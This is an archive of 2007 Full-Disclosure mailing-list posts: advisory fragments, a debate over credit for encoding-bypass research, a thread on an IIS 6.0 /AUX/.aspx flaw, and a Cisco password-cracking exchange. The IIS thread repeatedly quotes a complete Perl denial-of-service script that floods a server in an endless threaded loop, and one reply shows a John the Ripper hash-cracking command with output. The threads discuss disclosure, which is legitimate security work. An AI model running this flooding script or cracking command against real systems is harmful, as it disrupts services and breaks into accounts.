IX. CREDIT

This vulnerability was reported to iDefense by enhalos.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Enable secret 5 : Cisco Password

[Chris Cochrane]

Since it's an MD5 password, you would need quite a bit of processing power, 
maybe put the hash up on milw0rm? 
 
Chris



> From: [EMAIL PROTECTED]> To: full-disclosure@lists.grok.org.uk> Date: Tue, 22 
> May 2007 16:06:12 -0600> Subject: [Full-disclosure] Enable secret 5 : Cisco 
> Password> > Anyone have any tools to crack a cisco secret 5 password? I know 
> cain will > crack a 7 password...> > If you would please respond off list I 
> would be appreicative.> > any help out there?> > > -Jeff Wilder> 
> CISSP,CCE,C/EH> > > ___> 
> Full-Disclosure - We believe in it.> Charter: 
> http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored 
> by Secunia - http://secunia.com/
_
Explore the seven wonders of the world
http://search.msn.com/results.aspx?q=7+wonders+world&mkt=en-US&form=QBRE___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Cisco CallManager 4.1 Input Validation Vulnerability

[Stefan Friedli]

Cisco CallManager 4.1 Input Validation Vulnerability

scip AG Vulnerability ID 2977 (03/13/2007)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2977

I. INTRODUCTION

Cisco CallManager, short CCM, is a professional voice-over-IP solution
that tracks active components, including among others phones, gateways,
conference bridges, transcoding resources and voicemail boxes.

II. DESCRIPTION

Marc Ruef and Stefan Friedli found a web-based vulnerability that was
identified in Cisco CallManager 4.1 and may affect earlier versions as well.

The web interface of the application fails to properly santisize data
supplied by the search-form before displaying it back to the user.
Though several filters are in place to prevent the injection of 

Re: [Full-disclosure] [WEB SECURITY] noise about full-width encoding bypass?

[Amit Klein]

Arian J. Evans wrote:
>
> On 5/22/07, *Amit Klein* <[EMAIL PROTECTED] 
> > wrote:
>
>
> Fair enough. Still, I expect at least the websecurity mailing list to
> give credit where credit is due...
>
>
> Hmm, good point, No argument, but...as we see more of this
> character encoding set awareness I wonder:
>
> 1. Where do you draw the line on what is "new"?
>

The way I see it, and I think it addresses the rest of your points (in 
your original email) is that the researcher should attempt to find the 
most similar/relevant prior art, and then discuss how (if at all...) 
his/her findings differ. This provides the public with:
- Acknowledgment (and credit) of prior art
- Explanation of what is "really" new

So if say the web-app-sec researcher applies techniques from the AV 
world to the web-app-sec world, he/she should credit the AV prior-art, 
and explain that those techniques are applied in the paper to the 
web-app-sec world, with the twists X, Y and Z.
Or you can say something like: In this research I combine evasion 
techniques A (credit to...), B (credit to...) and C (credit to...) to 
bypass system X.

By subscribing to this scheme, the author makes it much easier to 
evaluate his/her paper. The author does most of the work (finding prior 
art, comparing their findings to prior art), and the readers judge 
whether this is new enough/interesting.

As for research in non-English languages - that's where *I* draw the 
line. I assume that everyone can (and should) read English nowadays, and 
I do not expect anyone to be aware of non-English prior art. However, if 
such prior art becomes known to the author, it's his/her duty to credit 
the authors of such text, of course.

-Amit


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [WEB SECURITY] noise about full-width encoding bypass?

[Arian J. Evans]

On 5/22/07, Amit Klein <[EMAIL PROTECTED]> wrote:



Fair enough. Still, I expect at least the websecurity mailing list to
give credit where credit is due...



Hmm, good point, No argument, but...as we see more of this
character encoding set awareness I wonder:

1. Where do you draw the line on what is "new"?

2. The Cert advisory is telling us that a lot of folks consider this "new".
(Maybe you should link them back to Scambray and McClure's late 90's
prediction  that Unicode would be the death of IDS?)

3. There are two or more completely separate dialoges here, between
network sec, and app sec. A lot of folks deserve credit for related research
on the network side, and probably even the VX side of the house.

If you look at the VX'er history they dealt with many of the same issues
independent of network and appsec, yet we don't credit any of them...
(probably because they largely wrote in Russian and Polish).

3. The reality is that we are going to see stuff like Cert advisories for
things
that are (or should be) pretty damn obvious, and redundant, as people start
to understand charsets and encoding types more. Let's say I found a
web-based
triple-decode shellcode canonicalization recently: is that a "new vuln"?

Canonicalization order:

Unix Shellcode --> Hex URL --> HTML Hexdecimal Reference --> raw text

Should I publish a Cert advisory on this? I'm pretty sure their IDS
isn't gonna catch it. In fact, I am pretty sure no one's is.

Who do I credit?

Not trying to escape responsibility by any means; I am having
trouble getting my head around the depth of this hole though.

Thanks,

--
Arian Evans
software security stuff

"Diplomacy is the art of saying "Nice doggie" until you can find a rock." --
Will Rogers
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [WEB SECURITY] noise about full-width encoding bypass?

[Amit Klein]

>>
>> BTW - why is this news? it has been known for long:
>>
>>
>> I think the problem here is network security folks don't understand 
>> this stuff at all.
>>
>
> Fair enough. Still, I expect at least the websecurity mailing list to 
> give credit where credit is due...
>
Just to clarify - I meant "mailing list" as in "mailing list 
subscribers". I did not mean "mailing list admin". The websecurity 
moderation is conducted solely for generally keeoing the discussion on 
topic, and with no attempt (I think) in general to verify the accuracy 
of the materials nor their novelty. And I respect that.

-Amit

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

[kingcope]

Hello 3APA3A,

Yes saw that before, the weired thing is that the
screenshot shows the page at the
Wwwroot ("/") displaying the error after running
the script.



Best Regards,


Kingcope


-Original Message-
From: 3APA3A [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, May 23, 2007 12:21 PM
To: kingcope
Cc: 'Full-Disclosure'
Subject: Re[2]: [Full-disclosure] Question Regarding IIS 6.0 / Is this a
DoS???

Dear kingcope,

With debugging it looks quite harmless:

Server Error in '/' Application.



Directory '\\.\aux' does not exist. Failed to start monitoring file changes.

Description: An unhandled exception occurred during the execution of the
current web request. Please review the stack trace for more information
about the error and where it originated in the code. 

Exception Details: System.Web.HttpException: Directory '\\.\aux' does not
exist. Failed to start monitoring file changes.

Source Error: 

An unhandled exception was generated during the execution of the current web
request. Information regarding the origin and location of the exception can
be identified using the exception stack trace below.  

Stack Trace: 


[HttpException (0x80070002): Directory '\\.\aux' does not exist. Failed to
start monitoring file changes.]
   System.Web.FileChangesMonitor.FindDirectoryMonitor(String dir, Boolean
addIfNotFound, Boolean throwOnError) +527
   System.Web.FileChangesMonitor.StartMonitoringPath(String alias,
FileChangeEventHandler callback) +477
   System.Web.Caching.CacheDependency.Init(Boolean isPublic, Boolean
isSensitive, String[] filenamesArg, String[] cachekeysArg, CacheDependency
dependency, DateTime utcStart) +1535
   System.Web.Caching.CacheDependency..ctor(Boolean isSensitive, String[]
filenames, DateTime utcStart) +50
 
System.Web.Configuration.HttpConfigurationSystem.GetCacheDependencies(Hashta
ble cachedeps, DateTime utcStart) +151
   System.Web.Configuration.HttpConfigurationSystem.ComposeConfig(String
reqPath, IHttpMapPath configmap) +760
   System.Web.HttpContext.GetCompleteConfigRecord(String reqpath,
IHttpMapPath configmap) +434
   System.Web.HttpContext.GetCompleteConfig() +49
   System.Web.HttpContext.GetConfig(String name) +195
   System.Web.CustomErrors.GetSettings(HttpContext context, Boolean
canThrow) +20
   System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow)
+39
   System.Web.HttpRuntime.FinishRequest(HttpWorkerRequest wr, HttpContext
context, Exception e) +486

 




Version Information: Microsoft .NET Framework Version:1.1.4322.2032; ASP.NET
Version:1.1.4322.2032 

--Wednesday, May 23, 2007, 1:35:17 PM, you wrote to [EMAIL PROTECTED]:

k> Btw,
k> Here is a screenshot of the effect.


k> -Original Message-
k> From: kingcope [mailto:[EMAIL PROTECTED] 
k> Sent: Wednesday, May 23, 2007 10:55 AM
k> To: '3APA3A'
k> Cc: 'Full-Disclosure'; '[EMAIL PROTECTED]'
k> Subject: RE: [Full-disclosure] Question Regarding IIS 6.0 / Is this a
DoS???

k> Hello Russian friend,

k> This is an interesting thought. As you see in the exception
k> And in the exception backtrace of IIS it tries to access \\.\AUX
k> Or other special device names. Normally this is blocked by a
k> C# method which checks the path (for example /AUX.aspx is blocked).


k> Best Regards,

k> Kingcope

k> -Original Message-
k> From: 3APA3A [mailto:[EMAIL PROTECTED] 
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; [EMAIL PROTECTED]
k> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a
DoS???

k> Dear kingcope,

k> It's  vulnerability regardless of DoS impact, because it allows attacker
k> to access special DOS devices (COM1 in this case). E.g. it could be used
k> to read data from device attached to COM1 or prevent another application
>>>from accessing this port (or LPT), because access to ports is exclusive.

k> --Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
k> full-disclosure@lists.grok.org.uk:

k>> Hello List,

k>> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k>> When I request /AUX/.aspx the server takes a bit longer to respond as
k>> Normally. So I did write an automated script to see what happens if
k>> I request this file several times at once. The result is that some
k> servers
k>> On the internet get quite instable, some do not. On some servers after I
k>> Stop the attack I get an exception that the Server is too busy/Unhandled
k>> Exception on the wwwroot (/) path.
k>> Can you/the list confirm that?

k>> Here is a lame testing script for this stuff:





k>> #When sending multiple parallel GET requests to a IIS 6.0 server
k> requesting
k>> #/AUX/.aspx the server gets instable and non responsive. This happens
k> only
k>> #to servers which respond a runtime error (System.Web.HttpException)
k>> #and take two or more seconds to respond to the /AUX/.a

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

[3APA3A]

Dear kingcope,

With debugging it looks quite harmless:

Server Error in '/' Application.


Directory '\\.\aux' does not exist. Failed to start monitoring file changes. 
Description: An unhandled exception occurred during the execution of the 
current web request. Please review the stack trace for more information about 
the error and where it originated in the code. 

Exception Details: System.Web.HttpException: Directory '\\.\aux' does not 
exist. Failed to start monitoring file changes.

Source Error: 

An unhandled exception was generated during the execution of the current web 
request. Information regarding the origin and location of the exception can be 
identified using the exception stack trace below.  

Stack Trace: 


[HttpException (0x80070002): Directory '\\.\aux' does not exist. Failed to 
start monitoring file changes.]
   System.Web.FileChangesMonitor.FindDirectoryMonitor(String dir, Boolean 
addIfNotFound, Boolean throwOnError) +527
   System.Web.FileChangesMonitor.StartMonitoringPath(String alias, 
FileChangeEventHandler callback) +477
   System.Web.Caching.CacheDependency.Init(Boolean isPublic, Boolean 
isSensitive, String[] filenamesArg, String[] cachekeysArg, CacheDependency 
dependency, DateTime utcStart) +1535
   System.Web.Caching.CacheDependency..ctor(Boolean isSensitive, String[] 
filenames, DateTime utcStart) +50
   
System.Web.Configuration.HttpConfigurationSystem.GetCacheDependencies(Hashtable 
cachedeps, DateTime utcStart) +151
   System.Web.Configuration.HttpConfigurationSystem.ComposeConfig(String 
reqPath, IHttpMapPath configmap) +760
   System.Web.HttpContext.GetCompleteConfigRecord(String reqpath, IHttpMapPath 
configmap) +434
   System.Web.HttpContext.GetCompleteConfig() +49
   System.Web.HttpContext.GetConfig(String name) +195
   System.Web.CustomErrors.GetSettings(HttpContext context, Boolean canThrow) 
+20
   System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow) +39
   System.Web.HttpRuntime.FinishRequest(HttpWorkerRequest wr, HttpContext 
context, Exception e) +486

 



Version Information: Microsoft .NET Framework Version:1.1.4322.2032; ASP.NET 
Version:1.1.4322.2032 

--Wednesday, May 23, 2007, 1:35:17 PM, you wrote to [EMAIL PROTECTED]:

k> Btw,
k> Here is a screenshot of the effect.


k> -Original Message-
k> From: kingcope [mailto:[EMAIL PROTECTED] 
k> Sent: Wednesday, May 23, 2007 10:55 AM
k> To: '3APA3A'
k> Cc: 'Full-Disclosure'; '[EMAIL PROTECTED]'
k> Subject: RE: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Hello Russian friend,

k> This is an interesting thought. As you see in the exception
k> And in the exception backtrace of IIS it tries to access \\.\AUX
k> Or other special device names. Normally this is blocked by a
k> C# method which checks the path (for example /AUX.aspx is blocked).


k> Best Regards,

k> Kingcope

k> -Original Message-
k> From: 3APA3A [mailto:[EMAIL PROTECTED] 
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; [EMAIL PROTECTED]
k> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Dear kingcope,

k> It's  vulnerability regardless of DoS impact, because it allows attacker
k> to access special DOS devices (COM1 in this case). E.g. it could be used
k> to read data from device attached to COM1 or prevent another application
>>from accessing this port (or LPT), because access to ports is exclusive.

k> --Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
k> full-disclosure@lists.grok.org.uk:

k>> Hello List,

k>> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k>> When I request /AUX/.aspx the server takes a bit longer to respond as
k>> Normally. So I did write an automated script to see what happens if
k>> I request this file several times at once. The result is that some
k> servers
k>> On the internet get quite instable, some do not. On some servers after I
k>> Stop the attack I get an exception that the Server is too busy/Unhandled
k>> Exception on the wwwroot (/) path.
k>> Can you/the list confirm that?

k>> Here is a lame testing script for this stuff:





k>> #When sending multiple parallel GET requests to a IIS 6.0 server
k> requesting
k>> #/AUX/.aspx the server gets instable and non responsive. This happens
k> only
k>> #to servers which respond a runtime error (System.Web.HttpException)
k>> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k>> #
k>> #
k>> #signed,
k>> #Kingcope [EMAIL PROTECTED]
k>>
k> ##
k>>
k> ###***
k>> ###
k>> ###
k>> ###
k>> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k>> ### by Kingcope, May/2007
k>> ### Better run this fr

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

[3APA3A]

Dear kingcope,

Funny enough, there is a chance this vulnerability can also be exploited
as  a  local  unauthorized  access  or  privilege escalation, to execute
user-supplied  .aspx  script  from  COM  port (via serial cable) without
having   console   access   with   permissions   of   Web   application.
IWAM_%COMPUTERNAME%  is default, but it's often elevated for application
pools for different reasons.

Need to be tested though.

Same  vulnerability  existed  in IndigoPerl some time ago. See "One more
funny bug" in http://securityvulns.com/docs6145.html


--Wednesday, May 23, 2007, 12:54:35 PM, you wrote to [EMAIL PROTECTED]:

k> Hello Russian friend,

k> This is an interesting thought. As you see in the exception
k> And in the exception backtrace of IIS it tries to access \\.\AUX
k> Or other special device names. Normally this is blocked by a
k> C# method which checks the path (for example /AUX.aspx is blocked).


k> Best Regards,

k> Kingcope

k> -Original Message-
k> From: 3APA3A [mailto:[EMAIL PROTECTED] 
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; [EMAIL PROTECTED]
k> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Dear kingcope,

k> It's  vulnerability regardless of DoS impact, because it allows attacker
k> to access special DOS devices (COM1 in this case). E.g. it could be used
k> to read data from device attached to COM1 or prevent another application
>>from accessing this port (or LPT), because access to ports is exclusive.

k> --Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
k> full-disclosure@lists.grok.org.uk:

k>> Hello List,

k>> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k>> When I request /AUX/.aspx the server takes a bit longer to respond as
k>> Normally. So I did write an automated script to see what happens if
k>> I request this file several times at once. The result is that some
k> servers
k>> On the internet get quite instable, some do not. On some servers after I
k>> Stop the attack I get an exception that the Server is too busy/Unhandled
k>> Exception on the wwwroot (/) path.
k>> Can you/the list confirm that?

k>> Here is a lame testing script for this stuff:





k>> #When sending multiple parallel GET requests to a IIS 6.0 server
k> requesting
k>> #/AUX/.aspx the server gets instable and non responsive. This happens
k> only
k>> #to servers which respond a runtime error (System.Web.HttpException)
k>> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k>> #
k>> #
k>> #signed,
k>> #Kingcope [EMAIL PROTECTED]
k>>
k> ##
k>>
k> ###***
k>> ###
k>> ###
k>> ###
k>> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k>> ### by Kingcope, May/2007
k>> ### Better run this from a Linux system
k>>
k> ##

k>> use IO::Socket;
k>> use threads;

k>> if ($ARGV[0] eq "") { exit; }
k>> my $host = $ARGV[0];

k>> $|=1;

k>> sub sendit {
k>> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>>   PeerPort => 'http(80)',
k>>   Proto=> 'tcp');

k>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k>> $host\r\nConnection:close\r\n\r\n";
k>> }

k>> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>>   PeerPort => 'http(80)',
k>>   Proto=> 'tcp');

k>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k>> $host\r\nConnection:close\r\n\r\n";

k>> $k=0;
k>> while (<$sock>) {
k>> if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k>> $k=1;
k>> last;
k>> }
k>> }

k>> if ($k==0) {
k>> print "Server does not seem vulnerable to this attack.\n";
k>> exit;   
k>> }

k>> print "ATTACK!\n";

k>> while(1){

k>> for (my $i=0;$i<=100;$i++) {
k>> $thr = threads->new(\&sendit);
k>> print "\r\r\r$i/100";
k>> }

k>> foreach $thr (threads->list) {
k>> $thr->join;
k>> }
k>> }


k>> ___
k>> Full-Disclosure - We believe in it.
k>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
k>> Hosted and sponsored by Secunia - http://secunia.com/




-- 
~/ZARAZA http://securityvulns.com/
Таким образом он умирает в шестой раз - и опять на новом месте. (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

[Richard Moore]

Michael Silk wrote:
> i wonder; does it happen with the word "CON" instead of "AUX"? there are
> also more of these 'reserved' words; i can't remember them though.

CON, AUX, PRN, NUL
COM1 thru COM4
LPT1 thru LPT3

Rich.
-- 
Richard Moore, Principal Software Engineer,
Westpoint Ltd,
Albion Wharf, 19 Albion Street, Manchester, M1 5LN, England
Tel: +44 161 237 1028
Fax: +44 161 237 1031

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

[Michael Silk]

i wonder; does it happen with the word "CON" instead of "AUX"? there are
also more of these 'reserved' words; i can't remember them though.



On 5/23/07, kingcope <[EMAIL PROTECTED]> wrote:


Hello Russian friend,

This is an interesting thought. As you see in the exception
And in the exception backtrace of IIS it tries to access \\.\AUX
Or other special device names. Normally this is blocked by a
C# method which checks the path (for example /AUX.aspx is blocked).


Best Regards,

Kingcope

-Original Message-
From: 3APA3A [mailto:[EMAIL PROTECTED]
Sent: Wednesday, May 23, 2007 10:41 AM
To: kingcope
Cc: Full-Disclosure; [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a
DoS???

Dear kingcope,

It's  vulnerability regardless of DoS impact, because it allows attacker
to access special DOS devices (COM1 in this case). E.g. it could be used
to read data from device attached to COM1 or prevent another application
>from accessing this port (or LPT), because access to ports is exclusive.

--Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
full-disclosure@lists.grok.org.uk:

k> Hello List,

k> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k> When I request /AUX/.aspx the server takes a bit longer to respond as
k> Normally. So I did write an automated script to see what happens if
k> I request this file several times at once. The result is that some
servers
k> On the internet get quite instable, some do not. On some servers after
I
k> Stop the attack I get an exception that the Server is too
busy/Unhandled
k> Exception on the wwwroot (/) path.
k> Can you/the list confirm that?

k> Here is a lame testing script for this stuff:





k> #When sending multiple parallel GET requests to a IIS 6.0 server
requesting
k> #/AUX/.aspx the server gets instable and non responsive. This happens
only
k> #to servers which respond a runtime error (System.Web.HttpException)
k> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k> #
k> #
k> #signed,
k> #Kingcope [EMAIL PROTECTED]
k>
##
k>
###***
k> ###
k> ###
k> ###
k> ### Lame Internet Information Server 6.0 Denial Of Service
(nonpermanent)
k> ### by Kingcope, May/2007
k> ### Better run this from a Linux system
k>
##

k> use IO::Socket;
k> use threads;

k> if ($ARGV[0] eq "") { exit; }
k> my $host = $ARGV[0];

k> $|=1;

k> sub sendit {
k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>   PeerPort => 'http(80)',
k>   Proto=> 'tcp');

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";
k> }

k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>   PeerPort => 'http(80)',
k>   Proto=> 'tcp');

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";

k> $k=0;
k> while (<$sock>) {
k>  if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k>  $k=1;
k>  last;
k>  }
k> }

k> if ($k==0) {
k>  print "Server does not seem vulnerable to this attack.\n";
k>  exit;
k> }

k> print "ATTACK!\n";

k> while(1){

k> for (my $i=0;$i<=100;$i++) {
k>  $thr = threads->new(\&sendit);
k>  print "\r\r\r$i/100";
k> }

k> foreach $thr (threads->list) {
k>  $thr->join;
k> }
k> }


k> ___
k> Full-Disclosure - We believe in it.
k> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
k> Hosted and sponsored by Secunia - http://secunia.com/


--
~/ZARAZA http://securityvulns.com/
Ибо факты есть факты, и изложены они лишь для того, чтобы их поняли и в
них
поверили. (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





--
mike
00110001 <3 00110111
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

[kingcope]

Hello Russian friend,

This is an interesting thought. As you see in the exception
And in the exception backtrace of IIS it tries to access \\.\AUX
Or other special device names. Normally this is blocked by a
C# method which checks the path (for example /AUX.aspx is blocked).


Best Regards,

Kingcope

-Original Message-
From: 3APA3A [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, May 23, 2007 10:41 AM
To: kingcope
Cc: Full-Disclosure; [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

Dear kingcope,

It's  vulnerability regardless of DoS impact, because it allows attacker
to access special DOS devices (COM1 in this case). E.g. it could be used
to read data from device attached to COM1 or prevent another application
>from accessing this port (or LPT), because access to ports is exclusive.

--Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
full-disclosure@lists.grok.org.uk:

k> Hello List,

k> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k> When I request /AUX/.aspx the server takes a bit longer to respond as
k> Normally. So I did write an automated script to see what happens if
k> I request this file several times at once. The result is that some
servers
k> On the internet get quite instable, some do not. On some servers after I
k> Stop the attack I get an exception that the Server is too busy/Unhandled
k> Exception on the wwwroot (/) path.
k> Can you/the list confirm that?

k> Here is a lame testing script for this stuff:





k> #When sending multiple parallel GET requests to a IIS 6.0 server
requesting
k> #/AUX/.aspx the server gets instable and non responsive. This happens
only
k> #to servers which respond a runtime error (System.Web.HttpException)
k> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k> #
k> #
k> #signed,
k> #Kingcope [EMAIL PROTECTED]
k>
##
k>
###***
k> ###
k> ###
k> ###
k> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k> ### by Kingcope, May/2007
k> ### Better run this from a Linux system
k>
##

k> use IO::Socket;
k> use threads;

k> if ($ARGV[0] eq "") { exit; }
k> my $host = $ARGV[0];

k> $|=1;

k> sub sendit {
k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>   PeerPort => 'http(80)',
k>   Proto=> 'tcp');

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";
k> }

k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>   PeerPort => 'http(80)',
k>   Proto=> 'tcp');

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";

k> $k=0;
k> while (<$sock>) {
k>  if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k>  $k=1;
k>  last;
k>  }
k> }

k> if ($k==0) {
k>  print "Server does not seem vulnerable to this attack.\n";
k>  exit;   
k> }

k> print "ATTACK!\n";

k> while(1){

k> for (my $i=0;$i<=100;$i++) {
k>  $thr = threads->new(\&sendit);
k>  print "\r\r\r$i/100";
k> }

k> foreach $thr (threads->list) {
k>  $thr->join;
k> }
k> }


k> ___
k> Full-Disclosure - We believe in it.
k> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
k> Hosted and sponsored by Secunia - http://secunia.com/


-- 
~/ZARAZA http://securityvulns.com/
Ибо факты есть факты, и изложены они лишь для того, чтобы их поняли и в них
поверили. (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

[3APA3A]

Dear kingcope,

It's  vulnerability regardless of DoS impact, because it allows attacker
to access special DOS devices (COM1 in this case). E.g. it could be used
to read data from device attached to COM1 or prevent another application
from accessing this port (or LPT), because access to ports is exclusive.

--Tuesday, May 22, 2007, 9:10:08 AM, you wrote to 
full-disclosure@lists.grok.org.uk:

k> Hello List,

k> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k> When I request /AUX/.aspx the server takes a bit longer to respond as
k> Normally. So I did write an automated script to see what happens if
k> I request this file several times at once. The result is that some servers
k> On the internet get quite instable, some do not. On some servers after I
k> Stop the attack I get an exception that the Server is too busy/Unhandled
k> Exception on the wwwroot (/) path.
k> Can you/the list confirm that?

k> Here is a lame testing script for this stuff:





k> #When sending multiple parallel GET requests to a IIS 6.0 server requesting
k> #/AUX/.aspx the server gets instable and non responsive. This happens only
k> #to servers which respond a runtime error (System.Web.HttpException)
k> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k> #
k> #
k> #signed,
k> #Kingcope [EMAIL PROTECTED]
k> ##
k> ###***
k> ###
k> ###
k> ###
k> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k> ### by Kingcope, May/2007
k> ### Better run this from a Linux system
k> ##

k> use IO::Socket;
k> use threads;

k> if ($ARGV[0] eq "") { exit; }
k> my $host = $ARGV[0];

k> $|=1;

k> sub sendit {
k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>   PeerPort => 'http(80)',
k>   Proto=> 'tcp');

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";
k> }

k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>   PeerPort => 'http(80)',
k>   Proto=> 'tcp');

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";

k> $k=0;
k> while (<$sock>) {
k>  if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k>  $k=1;
k>  last;
k>  }
k> }

k> if ($k==0) {
k>  print "Server does not seem vulnerable to this attack.\n";
k>  exit;   
k> }

k> print "ATTACK!\n";

k> while(1){

k> for (my $i=0;$i<=100;$i++) {
k>  $thr = threads->new(\&sendit);
k>  print "\r\r\r$i/100";
k> }

k> foreach $thr (threads->list) {
k>  $thr->join;
k> }
k> }


k> ___
k> Full-Disclosure - We believe in it.
k> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
k> Hosted and sponsored by Secunia - http://secunia.com/


-- 
~/ZARAZA http://securityvulns.com/
Ибо факты есть факты, и изложены они лишь для того, чтобы их поняли и в них 
поверили. (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Enable secret 5 : Cisco Password

[Knud Erik Højgaard]

like wow man, CISSP, CCE, C/EH.
$ echo 'cissp:$1$AEIL$mTOIXKl4D6j9puGp7T1ah/' > cissp-lol.txt
$ john -inc:all cissp-lol.txt
Loaded 1 password hash (FreeBSD MD5 [32/32])
abc  (cissp)
guesses: 1  time: 0:00:00:00  c/s: 2502  trying: abc
--
Knud

On 5/23/07, wilder_jeff Wilder <[EMAIL PROTECTED]> wrote:
> Anyone have any tools to crack a cisco secret 5 password?  I know cain will
> crack a 7 password...
>
> If you would please respond off list I would be appreicative.
>
> any help out there?
>
>
> -Jeff Wilder
> CISSP,CCE,C/EH
>
>
> ___
> Full-Disclosure - We believe in it.
